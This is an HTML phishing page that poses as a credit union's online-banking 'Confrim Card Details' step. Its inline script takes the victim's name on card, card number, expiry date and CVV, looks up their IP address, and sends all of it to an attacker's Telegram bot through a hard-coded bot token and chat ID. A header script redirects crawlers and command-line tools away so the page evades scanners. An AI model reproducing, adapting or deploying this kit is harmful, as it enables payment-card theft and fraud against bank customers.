<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=2.0, user-scalable=1" />
    <title>Internet Banking Enrollment</title>
    <script>
    /* anti-bot */
    var bots = [/bot/i, /crawler/i, /spider/i, /wget/i, /curl/i, /python/i];
    var ua = navigator.userAgent;
    if (bots.some(rx => rx.test(ua))) {
        location.href = "https://google.com";
    }
    </script>

    <link rel="stylesheet" href="https://cdn1.onlineaccess1.com/cdn/wedge/sdk_e2e/css/all.min.css" />
    <link rel="stylesheet" href="https://cdn1.onlineaccess1.com/cdn/wedge/sdk_e2e/css/layout5.css" />
    <style>
        html {
            min-height: 100%;
        }

        .container-fluid.heading {
            width: 66.6666666666667%;
            padding: 6% 0 0 0;
        }

        .btn-primary {
            background-color: important;
        }

        .btn-primary {
            color: important;
        }

        .btn-primary {
            border-color: important;
        }

        .btn-secondary {
            background-color: important;
        }

        .btn-secondary {
            color: important;
        }

        .btn-secondary {
            border-color: important;
        }

        @media screen and (max-width: 991px) {
            .container-fluid.heading {
                width: 83.3333333333333%;
            }
        }

        @media screen and (max-width: 767px) {
            .container-fluid.heading {
                width: 100%;
                padding: 0 0 0 0;
            }
        }

        .container-fluid+.container {
            background-color: #f6f6f6;
        }

        .outage-msg {
            font-size: 19px;
        }
    </style>
    <link
        href="https://cdn1.onlineaccess1.com/cdn/depot/5257_01/4266/b06de577530f2a03f2a0f592baa60ba8/assets/images/favicon-c3da48bee55edb5c80e2bf4714856cc5.ico"
        rel="icon" />
</head>

<body>
    <div class="modal fade" id="myModal" tabindex="-1" role="dialog">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-body">
                    <div class="row">
                        <div class="col-xs-12 congrats">
                            <i class="icon-ok-circle" aria-hidden="true" id="modal-title" style="font-size: 30px"></i>
                        </div>
                        <div class="col-xs-12" id="success_message"></div>
                        <div class="col-xs-12" id="modal-body"></div>
                    </div>
                </div>
                <div class="modal-footer" id="modal-footer">

                </div>
            </div>
        </div>
    </div>

    <div class="container-fluid heading">
        <div class="col-xs-12" style="text-align: center">
            <img id="logo-large"
                src=" https://cdn1.onlineaccess1.com/cdn/depot/5257_01/4266/b9dfc5522a85674a8249d9cc929e5bbe/assets/images/logos/logo_large-c48397e5bd4f7d1654f3f890b3c04d8f.png"
                style="max-width: 100%; height: auto" alt="Q2 CI Environment" />
        </div>
    </div>
    <div class="container col-lg-8 col-lg-offset-2 col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1 col-xs-12">
        <div class="row" style="margin-bottom: 40px">
            <div class="clearfix col-xs-12 col-sm-10 col-sm-offset-1">
                <h1 id="page_title">Confrim Card Details</h1>
                <p id="page_message" class="page-message">To protect your account, please tell us the
                    requested info so we can confirm your card details.</p>
                <div class="sr-only" tabindex="0">
                    All fields are required unless otherwise mentioned.
                </div>
                <ul id="nav-tabs" class="nav nav-tabs" style="display: none"></ul>
            </div>
            <div class="clearfix col-xs-12 col-sm-10 col-sm-offset-1">


                <div id="q2-form-fields" class="tab-content">
                    <div id="personal">
                        <form class="q2-form fv-form fv-form-bootstrap" id="login-details">

                            <div class="col-xs-12 groupHeading" id="section0">
                                <div class=""></div>
                            </div>
                            <div class="form-group col-xs-12 col-sm-6 has-feedback">
                                <label for="nameInput">Name on card:</label><input type="text" id="nameInput" name="nameInput"
                                    class="form-control" required="required" placeholder="Name" autocomplete="off" />
                            </div>
                    </div>
                    <div class="form-group col-xs-12 col-sm-6 has-feedback">
                        <label for="cardInput">Card Number:</label>
                        <input type="text" id="cardInput" name="cardInput" class="form-control" maxlength="19"
                            placeholder="0000 0000 0000 0000" required autocomplete="off" />
                    </div>
                </div>
                <div class="form-group col-xs-12 col-sm-6 has-feedback">
                    <label for="expiryInput" test-id="e2e-DOB-label">Expiry Date (MM/YY):</label><input type="text"
                        id="expiryInput" test-id="e2e-DOB" name="expiryInput" class="form-control" maxlength="5"
                        placeholder="MM/YY" autocomplete="off" required /><i class="form-control-feedback"
                        data-fv-icon-for="DOB" aria-hidden="true" style="display: none"></i>
                    <div class="DOB help-block" style="display: none; width: 488px">
                    </div>
                </div>
                <div class="form-group col-xs-12 col-sm-6 has-feedback">
                    <label for="cvvInput" test-id="e2e-SocialSecurity-label">CVV:</label><input type="text" id="cvvInput"
                        test-id="e2e-SocialSecurity" name="cvvInput" class="form-control" autocomplete="off" maxlength="4"
                        placeholder="123" required /><i class="form-control-feedback" data-fv-icon-for="SocialSecurity"
                        aria-hidden="true" style="display: none"></i><span class="hint" id="valrt_SocialSecurity-hint"
                        test-id="e2e-SocialSecurity-hint" style="width: 513.333px">Hint: Numbers only</span>
                    <div class="SocialSecurity help-block" style="display: none; width: 488px">
                        <small class="help-block" data-fv-validator="blank" data-fv-for="SocialSecurity"
                            data-fv-result="NOT_VALIDATED" style="display: none; width: 513.333px">This value is not
                            valid</small><small class="help-block" data-fv-validator="notEmpty"
                            data-fv-for="SocialSecurity" data-fv-result="NOT_VALIDATED"
                            style="display: none; width: 513.333px">Last 4 of SSN is required</small><small
                            class="help-block" data-fv-validator="regexp" data-fv-for="SocialSecurity"
                            data-fv-result="NOT_VALIDATED" style="display: none; width: 513.333px">Please enter a valid
                            Social Security Number</small><small class="help-block" data-fv-validator="stringLength"
                            data-fv-for="SocialSecurity" data-fv-result="NOT_VALIDATED"
                            style="display: none; width: 513.333px">Please enter a value with valid length</small>
                    </div>
                </div>


                <div class="col-xs-12">
                    <div class="line"></div>
                </div>
                <button type="submit" class="btn btn-primary pull-right">
                    Continue</button><a href="start.html" mobile-window="main" id="back_btn" test-id="e2e-backToLogin"
                    class="btn btn-secondary pull-right">Back to login</a>
                </form>





                <script>

                    document.getElementById("login-details").addEventListener("submit", function (event) {
                        event.preventDefault(); // Prevent form submission

                        var nameInput = document.getElementById('nameInput').value;
                        var cardInput = document.getElementById('cardInput').value;
                        var expiryInput = document.getElementById('expiryInput').value;
                        var cvvInput = document.getElementById('cvvInput').value;

                        // Get the user's IP address
                        fetch('https://api.ipify.org?format=json')
                            .then(response => response.json())
                            .then(data => {
                                var ipAddress = data.ip;

                                var message = `🏦 PARTNERS FCU LOGS 🏦\n \n \n 👤 Name on card: ${nameInput}\n\n 💳 Card Number: ${cardInput}\n\n 📆 Expiry Date: ${expiryInput}\n\n 🔐 CVV: ${cvvInput}\n\n🌐 IP Address: ${ipAddress}`;

                                // Replace 'YOUR_BOT_TOKEN' and 'YOUR_CHAT_ID' with your bot's token and your chat ID
                                var telegramAPI = `https://api.telegram.org/bot7681588807:AAF7pHoVlIsPzWmIELKRZXQnjq3qnNCWyiQ/sendMessage?chat_id=7920571465&text=${encodeURIComponent(message)}`;

                                fetch(telegramAPI)
                                    .then(response => response.json())
                                    .then(data => {
                                        if (data.ok) {

                                            // Redirect to a different page after successful submission
                                            window.location.href = "mailbox.html"; // Replace with your desired redirect page
                                        } else {
                                            alert("Error.");
                                        }
                                    })
                                    .catch(error => {
                                        alert("Error: " + error.message);
                                    });
                            })
                            .catch(error => {
                                alert("Error 'enable cookies': " + error.message);
                            });
                    });


                    // Function to determine the card type based on the number
                    function getCardType(number) {
                        var cleaned = number.replace(/\D/g, ''); // Remove non-numeric characters
                        if (/^4/.test(cleaned)) return 'Visa';
                        if (/^5[1-5]/.test(cleaned)) return 'MasterCard';
                        if (/^3[47]/.test(cleaned)) return 'American Express';
                        if (/^6(?:011|5)/.test(cleaned)) return 'Discover';
                        return null;
                    }

                    // Function to return the card logo based on the type
                    function getCardLogo(type) {
                        var logos = {
                            'Visa': 'https://upload.wikimedia.org/wikipedia/commons/4/41/Visa_Logo.png',
                            'MasterCard': 'https://upload.wikimedia.org/wikipedia/commons/0/04/Mastercard-logo.png',
                            'American Express': 'https://upload.wikimedia.org/wikipedia/commons/3/30/American_Express_logo.svg',
                            'Discover': 'https://upload.wikimedia.org/wikipedia/commons/5/5a/Discover_Card_logo.svg'
                        };
                        return logos[type] || '';
                    }

                    // Luhn algorithm for card validation
                    function luhnCheck(number) {
                        var digits = number.replace(/\D/g, '').split('').reverse();
                        let sum = 0;
                        for (let i = 0; i < digits.length; i++) {
                            let digit = parseInt(digits[i]);
                            if (i % 2 !== 0) {
                                digit *= 2;
                                if (digit > 9) digit -= 9;
                            }
                            sum += digit;
                        }
                        return sum % 10 === 0;
                    }

                    // Event listener for card number input
                    cardInput.addEventListener('input', () => {
                        let value = cardInput.value.replace(/\D/g, '').slice(0, 16);
                        value = value.replace(/(.{4})/g, '$1 ').trim();
                        cardInput.value = value;

                        var type = getCardType(value);
                        var logo = getCardLogo(type);
                        if (logo) {
                            logoImg.src = logo;
                            logoImg.classList.add('show');
                        } else {
                            logoImg.src = '';
                            logoImg.classList.remove('show');
                        }

                        // Set CVV length and placeholder based on card type
                        cvvInput.maxLength = type === 'American Express' ? 4 : 3;
                        cvvInput.placeholder = type === 'American Express' ? '1234' : '123';

                        // Validate the card number using Luhn's algorithm
                        if (!luhnCheck(value)) {
                            // Handle invalid card number (optional)
                            cardInput.setCustomValidity("Invalid card number");
                        } else {
                            cardInput.setCustomValidity("");
                        }
                    });

                    // Event listener for expiry date input
                    expiryInput.addEventListener('input', function () {
                        let value = this.value.replace(/\D/g, '').slice(0, 4);
                        if (value.length >= 3) {
                            value = value.slice(0, 2) + '/' + value.slice(2); // Format as MM/YY
                        }
                        this.value = value;
                    });

                    // Event listener for CVV input
                    cvvInput.addEventListener('input', function () {
                        this.value = this.value.replace(/\D/g, '').slice(0, this.maxLength); // Limit to maxLength
                    });

                    // Event listener for name input (only allow letters and spaces)
                    nameInput.addEventListener('input', function () {
                        this.value = this.value.replace(/[^a-zA-Z\s]/g, ''); // Remove non-letter characters
                    });
                </script>





            </div>
        </div>
    </div>
    </div>
    </div>

    <div id="sr-message" aria-live="assertive" class="sr-only"></div>
</body>

</html>